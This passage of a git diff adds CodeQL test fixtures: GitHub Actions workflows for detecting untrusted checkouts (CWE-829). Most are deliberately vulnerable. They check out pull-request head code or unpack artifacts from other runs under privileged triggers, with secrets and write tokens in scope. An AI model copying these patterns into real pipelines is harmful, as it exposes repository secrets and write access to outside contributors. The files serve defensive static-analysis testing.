[[ -n "$ZIPURL" ]]; then + break + fi + done + [[ -z "$ZIPURL" ]] && { echo "::error::Failed to find artifact."; exit 1; } + echo "Zip URL: $ZIPURL" + echo "zip_url=${ZIPURL}" >> "$GITHUB_OUTPUT" + if [[ -z "$PLUGINS" ]]; then + echo "Any plugins? No" + echo "any_plugins=false" >> "$GITHUB_OUTPUT" + else + echo "Any plugins? Yes" + echo "any_plugins=true" >> "$GITHUB_OUTPUT" + fi + + - name: Get token + id: get_token + if: ${{ ! success() }} + uses: ./.github/actions/gh-app-token + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + - name: 'Mark "Test plugin upgrades" failed' + if: ${{ ! success() }} + uses: ./.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + conclusion: failure + title: Failed to find build artifact + summary: | + ${{ env.SUMMARY }} + + Post-build run aborted because the "Find artifact" step failed. + token: ${{ steps.get_token.outputs.token }} + + no_plugins: + name: Handle no-plugins + runs-on: ubuntu-latest + needs: [ setup, find_artifact ] + if: needs.find_artifact.outputs.any_plugins == 'false' + timeout-minutes: 2 # 2022-08-26: Seems like it should be fast. + steps: + - uses: actions/checkout@v4 + + - name: Get token + id: get_token + uses: ./.github/actions/gh-app-token + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + + - name: 'Mark "Test plugin upgrades" skipped' + uses: ./.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + conclusion: skipped + title: No plugins were built + summary: | + ${{ env.SUMMARY }} + + Post-build run skipped because no plugins were built. + token: ${{ steps.get_token.outputs.token }} + + upgrade_test: + name: Test plugin upgrades + runs-on: ubuntu-latest + needs: [ setup, find_artifact ] + if: needs.find_artifact.outputs.any_plugins == 'true' + timeout-minutes: 15 # 2022-08-26: Successful runs seem to take about 6 minutes, but give some extra time for the downloads. + services: + db: + image: mariadb:lts + env: + MARIADB_ROOT_PASSWORD: wordpress + ports: + - 3306:3306 + options: --health-cmd="healthcheck.sh --su-mysql --connect --innodb_initialized" --health-interval=10s --health-timeout=5s --health-retries=5 + container: + image: ghcr.io/automattic/jetpack-wordpress-dev:latest + env: + WP_DOMAIN: localhost + WP_ADMIN_USER: wordpress + WP_ADMIN_EMAIL: wordpress@example.com + WP_ADMIN_PASSWORD: wordpress + WP_TITLE: Hello World + MYSQL_HOST: db:3306 + MYSQL_DATABASE: wordpress + MYSQL_USER: root + MYSQL_PASSWORD: wordpress + HOST_PORT: 80 + ports: + - 80:80 + steps: + - uses: actions/checkout@v4 + with: + path: trunk + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.workflow_run.head_commit.id }} + path: commit + + - name: Get token + id: get_token + uses: ./trunk/.github/actions/gh-app-token + env: + # Work around a weird node 16/openssl 3 issue in the docker env + OPENSSL_CONF: '/dev/null' + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + + - name: Notify check in progress + uses: ./trunk/.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + status: in_progress + title: Test started... + summary: | + ${{ env.SUMMARY }} + + See run [#${{ github.run_id }}](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}) for details. + token: ${{ steps.get_token.outputs.token }} + + - name: Download build artifact + env: + TOKEN: ${{ github.token }} + ZIPURL: ${{ needs.find_artifact.outputs.zip_url }} + shell: bash + run: | + for (( i=1; i<=2; i++ )); do + [[ $i -gt 1 ]] && sleep 10 + echo "::group::Downloading artifact (attempt $i/2)" + curl -v -L --get \ + --header "Authorization: token $TOKEN" \ + --url "$ZIPURL" \ + --output "artifact.zip" + echo "::endgroup::" + if [[ -e "artifact.zip" ]] && zipinfo artifact.zip &>/dev/null; then + break + fi + done + [[ ! -e "artifact.zip" ]] && { echo "::error::Failed to download artifact."; exit 1; } + unzip artifact.zip + tar --xz -xvvf build.tar.xz build + + - name: Setup WordPress + run: trunk/.github/files/test-plugin-update/setup.sh + + - name: Prepare plugin zips + id: zips + run: trunk/.github/files/test-plugin-update/prepare-zips.sh + + - name: Test upgrades + id: tests + run: trunk/.github/files/test-plugin-update/test.sh + + - name: Notify final status + if: always() + uses: ./trunk/.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + conclusion: ${{ job.status }} + title: ${{ job.status == 'success' && 'Tests passed' || job.status == 'cancelled' && 'Cancelled' || 'Tests failed' }} + summary: | + ${{ env.SUMMARY }} + + ${{ steps.zips.outputs.info }}${{ steps.tests.outputs.info }} + + See run [#${{ github.run_id }}](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}) for details. + token: ${{ steps.get_token.outputs.token }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml new file mode 100644 index 000000000000..f679b772e340 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml @@ -0,0 +1,23 @@ +name: Sonar +on: + workflow_run: + workflows: [PR Build] + types: [completed] +jobs: + sonar: + runs-on: ubuntu-latest + timeout-minutes: 30 + if: github.event.workflow_run.conclusion == 'success' + steps: + - name: Checkout PR code + uses: actions/checkout@v3 + with: + repository: ${{ github.event.workflow_run.head_repository.full_name }} + ref: ${{ github.event.workflow_run.head_branch }} + fetch-depth: 0 + + - name: SonarCloud Scan + uses: sonarsource/sonarcloud-github-action@master + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml new file mode 100644 index 000000000000..6347db51e3c9 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml @@ -0,0 +1,41 @@ +name: Sonar +on: + workflow_run: + workflows: [PR Build] + types: [completed] +jobs: + sonar: + runs-on: ubuntu-latest + timeout-minutes: 30 + if: github.event.workflow_run.conclusion == 'success' + steps: + - name: Download artifacts + uses: actions/github-script@v6 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "rsc-pr-build-artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/rsc-pr-build-artifacts.zip`, Buffer.from(download.data)); + + - name: Unzip artifacts + run: unzip rsc-pr-build-artifacts.zip + + - name: SonarCloud Scan + uses: sonarsource/sonarcloud-github-action@master + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml new file mode 100644 index 000000000000..c4f90b97d05b --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml @@ -0,0 +1,22 @@ +on: + pull_request_target: + types: [ opened, synchronize ] + +permissions: {} +jobs: + test: + permissions: + contents: write + pull-requests: write + + runs-on: ubuntu-latest + env: + GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}" + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v4 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.ref }} + - run: | + ./cmd diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml new file mode 100644 index 000000000000..64e4992b5caf --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml @@ -0,0 +1,20 @@ +name: "Frogbot Scan Pull Request" +on: + pull_request_target: + types: [ opened, synchronize ] +permissions: + pull-requests: write + contents: read +jobs: + scan-pull-request: + runs-on: ubuntu-latest + environment: frogbot + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: jfrog/frogbot@8fbeca612957ae5f5f0c03a19cb6e59e237026f3 # v2.10.0 + env: + JF_URL: ${{ secrets.JF_URL }} + JF_ACCESS_TOKEN: ${{ secrets.JF_ACCESS_TOKEN }} + JF_GIT_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml new file mode 100644 index 000000000000..942b17967d32 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml @@ -0,0 +1,22 @@ +on: + pull_request_target: + types: [ opened, synchronize ] + +permissions: {} +jobs: + test: + permissions: + contents: write + pull-requests: write + + runs-on: ubuntu-latest + env: + GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}" + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v4 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.sha }} + - run: | + ./cmd diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test21.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test21.yml new file mode 100644 index 000000000000..3bb48221225c --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test21.yml @@ -0,0 +1,27 @@ +on: + push: + branches: [main] + pull_request: + branches: [main] + workflow_dispatch: + inputs: + publish_docs: + description: "pub" + default: true + type: boolean + +jobs: + Docs: + if: github.repository == 'test/test' + runs-on: macos-14 + steps: + - name: Checkout Repository + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name || github.repository }} + token: ${{ secrets.GITHUB_TOKEN }} + ref: ${{ github.head_ref || github.ref }} + fetch-depth: 0 + - run: | + # NOT VULNERABLE + python docs/build_docs.py diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml new file mode 100644 index 000000000000..2f3b0bb876f6 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml @@ -0,0 +1,62 @@ +on: + pull_request: + push: + branches: + - trunk + - 'release/**' + - 'wp/**' + workflow_dispatch: + inputs: + version: + description: '' + required: true + +jobs: + bump-version: + name: Bump version + runs-on: ubuntu-latest + outputs: + release_branch: ${{ steps.get_version.outputs.release_branch }} + + steps: + - name: Compute old and new version + id: get_version + run: | + OLD_VERSION=$(jq --raw-output '.version' package.json) + echo "old_version=${OLD_VERSION}" >> $GITHUB_OUTPUT + if [[ ${{ github.event.inputs.version }} == 'stable' ]]; then + NEW_VERSION=$(npx semver $OLD_VERSION -i patch) + else + if [[ $OLD_VERSION == *"rc"* ]]; then + NEW_VERSION=$(npx semver $OLD_VERSION -i prerelease) + else + # WordPress version guidelines: If minor is 9, bump major instead. + IFS='.' read -r -a OLD_VERSION_ARRAY <<< "$OLD_VERSION" + if [[ ${OLD_VERSION_ARRAY[1]} == "9" ]]; then + NEW_VERSION="$(npx semver $OLD_VERSION -i major)-rc.1" + else + NEW_VERSION="$(npx semver $OLD_VERSION -i minor)-rc.1" + fi + fi + fi + echo "new_version=${NEW_VERSION}" >> $GITHUB_OUTPUT + IFS='.' read -r -a NEW_VERSION_ARRAY <<< "$NEW_VERSION" + RELEASE_BRANCH="release/${NEW_VERSION_ARRAY[0]}.${NEW_VERSION_ARRAY[1]}" + echo "release_branch=${RELEASE_BRANCH}" >> $GITHUB_OUTPUT + + build: + runs-on: ubuntu-latest + needs: bump-version + if: | + always() && ( + github.event_name == 'pull_request' || + github.event_name == 'workflow_dispatch' || + github.repository == 'test/test' + ) + steps: + - name: Checkout code + uses: actions/checkout@eef61447b9ff4aafe5dcd4e0bbf5d482be7e7871 # v4.2.1 + with: + ref: ${{ needs.bump-version.outputs.release_branch || github.ref }} + + - run: ./bin/build-plugin-zip.sh diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml new file mode 100644 index 000000000000..da889dd2ac6f --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml @@ -0,0 +1,47 @@ +on: + schedule: + - cron: "0 3 * * 2-6" # Tuesdays - Saturdays, at 3am UTC + workflow_dispatch: + inputs: + pr: + description: "PR Number" + required: false + type: number + release: + types: [ published ] + +jobs: + resolve-required-data: + name: Resolve Required Data + if: ${{ github.repository_owner == 'test' }} + runs-on: ubuntu-latest + outputs: + ref: ${{ steps.script.outputs.ref }} + steps: + - name: Resolve and set checkout and version data to use for release + id: script + uses: actions/github-script@v7 + env: + PR_NUMBER: ${{ github.event.inputs.pr }} + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + script: | + const script = require('${{ github.workspace }}/scripts/publish-resolve-data.js'); + await script({ github, context, core }); + + build: + needs: [ resolve-required-data ] + if: ${{ github.repository_owner == 'test' }} + name: stable + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + repository: ${{ needs.resolve-required-data.outputs.repo }} + ref: ${{ needs.resolve-required-data.outputs.ref }} + + - name: Build + shell: bash + run: | + ./cmd + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml new file mode 100644 index 000000000000..8502d081a734 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml @@ -0,0 +1,20 @@ +on: [ workflow_dispatch, pull_request ] +jobs: + test: + runs-on: ubuntu-20.04 + if: github.event_name == 'pull_request' + steps: + - name: Check out repository code + uses: actions/checkout@v2 + + - name: Fetch base and head on PR + if: ${{ github.event.pull_request.base.sha }} + run: | + git fetch origin master ${{ github.event.pull_request.base.sha }} + git fetch origin master ${{ github.event.pull_request.head.sha }} + + - name: Check that Pull Request includes updating the Version + run: | + git show ${{ github.event.pull_request.base.sha }}:src/mplfinance/_version.py > scripts/tv0.py + git show ${{ github.sha }}:src/mplfinance/_version.py > scripts/tv1.py + python scripts/version_update_check.py tv0 tv1 diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml new file mode 100644 index 000000000000..c825cc73813b --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml @@ -0,0 +1,42 @@ +on: + workflow_run: + workflows: [ "build" ] + types: [ completed ] + +defaults: + run: + shell: bash + +jobs: + publish-build-scans: + name: Build scan publish + if: github.repository == 'test/test' && github.event.workflow_run.event == 'pull_request' && github.event.workflow_run.conclusion != 'cancelled' + runs-on: ubuntu-latest + steps: + # Checkout target branch which has trusted code + - name: Check out target branch + uses: actions/checkout@v4 + with: + persist-credentials: false + ref: ${{ github.ref }} + - name: Download build scan + id: downloadBuildScan + uses: actions/download-artifact@v4 + with: + name: build-scan + github-token: ${{ github.token }} + repository: ${{ github.repository }} + run-id: ${{ github.event.workflow_run.id }} + # Don't fail a build if the file doesn't exist + continue-on-error: true + - name: Extract previously uploaded build scan content + if: ${{ steps.downloadBuildScan.outcome != 'failure'}} + run: tar -xzf build-scan.tgz -C ~ + - name: Publish + if: ${{ steps.downloadBuildScan.outcome != 'failure'}} + # Don't fail a build if publishing fails + continue-on-error: true + run: | + ./gradlew buildScanPublishPrevious + env: + ACCESS_KEY: ${{ secrets.TEST_ACCESS_KEY }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml new file mode 100644 index 000000000000..32f45698a561 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml @@ -0,0 +1,22 @@ +on: + schedule: + - cron: '7 18 * * *' + workflow_run: + workflows: [Trigger] + types: [completed] + workflow_dispatch: +jobs: + resolve: + if: (github.repository == 'test/test' && (github.event_name != 'workflow_run' || github.event.workflow_run.conclusion == 'success')) || github.event_name == 'workflow_dispatch' + uses: ./.github/workflows/resolve-args.yml + with: + comment: "foo" + scale: + permissions: + id-token: write + statuses: write + needs: [resolve] + if: needs.resolve.outputs.SHOULD_RUN == 'true' + uses: ./.github/workflows/test27.yml + with: + git_ref: ${{ needs.resolve.outputs.GIT_REF }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml new file mode 100644 index 000000000000..b1d776ef6c8a --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml @@ -0,0 +1,22 @@ +on: + workflow_dispatch: + inputs: + git_ref: + description: ref + type: string + workflow_call: + inputs: + git_ref: + type: string +jobs: + run: + permissions: + id-token: write + statuses: write + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + with: + ref: ${{ inputs.git_ref }} + - run: | + ./cmd diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml new file mode 100644 index 000000000000..5f67fecc09a5 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml @@ -0,0 +1,20 @@ +on: + pull_request_target: + types: [opened, ready_for_review, synchronize, reopened, labeled, unlabeled] + branches: + - main + +permissions: + contents: read + +jobs: + setup-environment: + permissions: + contents: write + runs-on: ubuntu-latest + if: ${{ !contains(github.event.pull_request.labels.*.name, 'major-update') && (github.actor == 'renovate[bot]' || contains(github.event.pull_request.labels.*.name, 'renovatebot')) }} + steps: + - uses: actions/checkout@eef61447b9ff4aafe5dcd4e0bbf5d482be7e7871 # v4.2.1 + with: + ref: ${{ github.head_ref }} + - run: make foo diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml new file mode 100644 index 000000000000..cc7f71a7b3e4 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml @@ -0,0 +1,21 @@ +on: pull_request_target + +jobs: + test: + permissions: write-all + runs-on: ubuntu-latest + steps: + - name: Checkout repository + uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + fetch-depth: 0 + + - uses: actions/github-script@v5 + with: + github-token: ${{secrets.GITHUB_TOKEN}} + script: | + const { + foo + } = require('./foo'); + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml new file mode 100644 index 000000000000..d9aa2973e007 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml @@ -0,0 +1,41 @@ +name: "Test" +permissions: + actions: none + checks: none + contents: read + deployments: none + id-token: none + issues: none + discussions: none + packages: none + pages: none + pull-requests: read + repository-projects: none + security-events: none + statuses: none +on: + pull_request_target: + types: + - opened + - edited + - synchronize + +jobs: + main: + name: Test Pull Request + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: npm install + working-directory: scripts/github-actions/semantic-pull-request/ + - name: Lint PR Title + if: github.event_name == 'pull_request_target' + uses: actions/github-script@v7 + with: + script: | + const verifyPullRequest = require('./scripts/github-actions/semantic-pull-request') + await verifyPullRequest({ context, core, github }) diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml new file mode 100644 index 000000000000..f82f493cd6e0 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml @@ -0,0 +1,47 @@ +name: Publish + +on: + push: + branches: + - main + pull_request_target: + workflow_dispatch: + workflow_call: + +jobs: + build-and-upload: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + + - name: Checkout PR + if: ${{ github.event_name == 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Checkout + if: ${{ github.event_name != 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: main + + - name: Setup Pages + uses: actions/configure-pages@v1 + - name: Use Node.js + uses: actions/setup-node@v3 + with: + node-version: 18 + cache: npm + - name: Update npm to latest + run: npm i --prefer-online --no-fund --no-audit -g npm@latest + - run: npm -v + - run: npm i --ignore-scripts --no-audit --no-fund --package-lock + - run: npm run build -w www + - name: Upload artifact + uses: actions/upload-pages-artifact@v1 + with: + path: './workspaces/www/build' + - run: python2.7 foo.py diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml new file mode 100644 index 000000000000..a4acd7387660 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml @@ -0,0 +1,68 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/comment_victim.yml +name: Comment Triggered Test +on: + issue_comment: + types: [created] +permissions: 'write-all' +jobs: + test1: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).sha }} + - run: bash comment_example/tests.sh + + test2: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).ref }} + - run: bash comment_example/tests.sh + + test3: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: "refs/pull/${{ github.event.number }}/merge" + - run: bash comment_example/tests.sh diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml new file mode 100644 index 000000000000..f532e4266ad1 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml @@ -0,0 +1,45 @@ +name: Test + + +on: + workflow_run: + workflows: ["Foo"] + types: + - completed + +jobs: + docker: + runs-on: ubuntu-latest + if: > + github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' + outputs: + version-json: ${{ steps.show_versions.outputs.version-json }} + steps: + - name: 'Download artifact' + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{ github.event.workflow_run.id }}, + }); + var matchArtifactNacos = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "nacos" + })[0]; + var download = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifactNacos.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/nacos.zip', Buffer.from(download.data)); + - run: | + unzip nacos.zip + mkdir nacos + cp -r nacos-* nacos/ + - name: save docker_2 images + run: | + mv ./build_backup/* nacos-e2e/cicd/build/ diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml new file mode 100644 index 000000000000..7a346a897e45 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml @@ -0,0 +1,60 @@ +name: Benchmark + +on: + issue_comment: + types: [created] + +env: + TURBO_TOKEN: ${{ secrets.TURBO_TOKEN }} + TURBO_TEAM: ${{ secrets.TURBO_TEAM }} + FORCE_COLOR: true + +jobs: + benchmark: + if: ${{ github.repository_owner == 'foo' && github.event.issue.pull_request && startsWith(github.event.comment.body, '!bench') }} + runs-on: ubuntu-latest + permissions: + contents: read + steps: + - uses: actions/checkout@v4 + with: + persist-credentials: false + ref: refs/pull/${{ github.event.issue.number }}/head + + - name: Setup PNPM + uses: pnpm/action-setup@v3 + + - name: Setup Node + uses: actions/setup-node@v4 + with: + node-version: 18 + cache: "pnpm" + + - name: Install dependencies + run: pnpm install + + - name: Build Packages + run: pnpm run build + + - name: Get bench command + id: bench-command + env: + # protects from untrusted user input and command injection + COMMENT: ${{ github.event.comment.body }} + run: | + benchcmd=$(echo "$COMMENT" | grep '!bench' | awk -F ' ' '{print $2}') + echo "bench=$benchcmd" >> $GITHUB_OUTPUT + shell: bash + + - name: Run benchmark + id: benchmark-pr + run: | + result=$(pnpm run --silent benchmark ${{ steps.bench-command.outputs.bench }}) + processed=$(node ./benchmark/ci-helper.js "$result") + echo "BENCH_RESULT<> $GITHUB_OUTPUT + echo "### PR Benchmark" >> $GITHUB_OUTPUT + echo "$processed" >> $GITHUB_OUTPUT + echo "BENCHEOF" >> $GITHUB_OUTPUT + shell: bash + - run: python2.7 foo.py + - run: pip install --no-deps . diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml new file mode 100644 index 000000000000..381cc16a6d16 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml @@ -0,0 +1,44 @@ +name: OpenAPI +on: + push: + branches: + - master + tags: + - 'v*' + pull_request_target: + +permissions: {} + +jobs: + + openapi-base: + name: OpenAPI - BASE + if: ${{ github.base_ref != '' }} + runs-on: ubuntu-latest + permissions: read-all + steps: + - name: Checkout repository + uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6 + with: + ref: ${{ github.event.pull_request.head.sha }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + fetch-depth: 0 + - name: Generate openapi.json + run: dotnet test tests/Jellyfin.Server.Integration.Tests/Jellyfin.Server.Integration.Tests.csproj -c Release --filter "Jellyfin.Server.Integration.Tests.OpenApiSpecTests" + + publish-unstable: + name: OpenAPI - Publish Unstable Spec + if: ${{ github.event_name != 'pull_request_target' && !startsWith(github.ref, 'refs/tags/v') && contains(github.repository_owner, 'jellyfin') }} + runs-on: ubuntu-latest + needs: + - openapi-base + steps: + - name: Upload openapi.json (unstable) to repository server + uses: appleboy/scp-action@917f8b81dfc1ccd331fef9e2d61bdc6c8be94634 # v0.1.7 + with: + host: "${{ secrets.REPO_HOST }}" + username: "${{ secrets.REPO_USER }}" + key: "${{ secrets.REPO_KEY }}" + source: openapi-head/openapi.json + strip_components: 1 + target: "/srv/incoming/openapi/unstable/jellyfin-openapi-${{ env.JELLYFIN_VERSION }}" diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml new file mode 100644 index 000000000000..6f7ff665be3b --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml @@ -0,0 +1,18 @@ +name: OpenAPI +on: + pull_request_target: + +permissions: {} + +jobs: + base: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6 + with: + ref: ${{ github.event.pull_request.head.sha }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + fetch-depth: 0 + - run: + sed -f script/config foo.md > bar.md + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml new file mode 100644 index 000000000000..992686fb5aa8 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml @@ -0,0 +1,11 @@ +on: + pull_request + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: foo/bar + - uses: foo/bar@v1 + - uses: foo/bar@25b062c917b0c75f8b47d8469aff6c94ffd89abb diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml new file mode 100644 index 000000000000..15d4813c40e9 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml @@ -0,0 